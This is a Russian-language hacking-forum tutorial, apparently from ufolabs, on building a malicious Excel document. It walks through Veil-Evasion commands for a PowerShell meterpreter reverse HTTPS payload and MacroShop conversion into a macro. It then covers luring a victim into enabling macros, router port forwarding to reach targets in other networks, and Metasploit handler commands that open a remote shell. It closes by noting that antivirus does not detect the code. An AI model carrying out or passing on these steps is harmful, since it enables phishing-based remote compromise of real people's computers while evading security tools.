Penetration Testing with Microsoft Office

Admin

ufo
Administrator
12.08.2016
576
381
#1
В этой статье я покажу, как можно получить доступ к удаленному компьютеру, используя Veil Evasion и Microsoft Excel. А точнее одно свойство Excel – поддержка макросов.

Макрос - это программа, которая содержит набор инструкций выполняющих какие либо действия, как автоматически, так и по требованию пользователя, т.е. выполняются явно и неявно. Широкое распространение, данное понятие получило благодаря корпорации Microsoft, которая реализовала возможность написания макросов в своих продуктах, а именно Office (Word, Excel, Access и т.д.). Используемый язык в макросах - Visual Basic, так же продукт Microsoft, но с некоторыми ограничениями. Макрокоманды, способны автоматизировать большинство процессов и значительно сократить время на обработку данных.

Способ получения Veil Evasion описан тут - https://ufolabs.pro/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.597/

Запускаем Veil Evasion:
> ./Veil-Evasion.py

Вводим команду:
list (покажет список доступных пайлоадов)

Мы будем использовать пайлоад с ID 23. Вводим:

> use powershell/meterpreter/rev_https

или

> use 23

Обратный протокол HTTPS, здесь будет успешно использован, в случае если файрвол у жертвы настроен таким образом, чтобы пропускать трафик по TCP. В большинстве случаев, на компьютере HTTPS не заблокирован.

Настроим Veil для нашего случая, пишем:

> set LHOST 172.16.0.199

Тут я немного прервусь, для объяснений, т.к. вопросы уже были.

Так как, я нахожусь с атакуемым компьютером в одной подсети, мы подключены к одному роутеру, то в поле LHOST я вписываю свой локальный адрес.

Именно на него «постучится» цель, после того как на нем сработает полезная нагрузка. Чтобы таким же образом подключится к компьютеру находящемуся в другой сети, вообще в другом городе/стране, необходимо сделать иначе. Для удобства лучше иметь статический (белый) IP адрес. К примеру, у вас роутер, вашей машине, с которой вы атакуете, был присвоен локальный адрес из диапазона 192.168.0.ХХХ. Но, в интернет вы выходите из под своего внешнего адреса, который присвоил вашему роутеру провайдер. Ваш компьютер, с которого вы проводите проникновение, находится за NAT роутера.

Допустим этот адрес 82.198.34.88, для того, чтобы целевой компьютер постучался на него мы в поле LHOST его и укажем. В опциях так же есть поле LPORT:


Именно на этот LHOST и LPORT, будет пытаться подсоединиться цель. Затем необходимо указать роутеру, чтобы все пакеты, адресованные 8443 порту, он направлял нашей машине с Kali, у которой адрес 192.168.0.ХХХ. Для этого добавляем такое правило:


Теперь все пакеты, которые предназначаются 443 (у меня так) порту, получит моя Kali c локальным адресом 192.168.0.101. Идем далее.

> generate

Вводим имя:

Veil-Evasion сгенерировала нам файл win8.1.bat в директории - /usr/share/veil-output/source/


Теперь откроем новое окно терминала и установим MacroShop. MacroShop представляет собой набор скриптов, помогающих в работе с пайлоадами, через Office Macros. Большинство из них, написаны на Python. Для его установки вводим:

> git clone https://github.com/khr0x40sh/MacroShop


После установки, переместим файл win8.1 в директорию MacroShop.

Теперь, в терминале перейдем в директорию MacroShop, и пишем:

> python macro_safe.py windus.bat file.txt (windus.bat – потому, что я его пересоздал)


После того, как процесс успешно завершился, откроем новый файл Excel (у себя) и проделаем следующее:


Пишем имя макроса и создаем его. В открывшееся поле для редактирования, копируем код, который мы получили в файле – file.txt, затем сохраним макрос.


Копируем код полностью, заменяя строки которые были в начале макроса, это важно!

Сохраняем в формате, как на скриншоте:

В самом документе пишем все, что угодно, нам нужно заинтересовать цель в открытии документа и включения макроса.

Теперь, когда файл оказался на целевом компьютере, у себя в терминале откроем msfconsole

и введем следующие команды:

> use multi/handler

> set payload/windows/meterpreter/reverse_https

> set LHOST 192.168.0.XXX

> set LPORT XXX (ваш порт)

> exploit


Когда на целевом хосте буде открыт дынный файл и выполнится макрос, у вас откроется сессия meterpreter, как и было обещано.

Дальше дело техники. Спасибо за внимание.

P.S. Антивирусы не определяют данный код как вредоносный.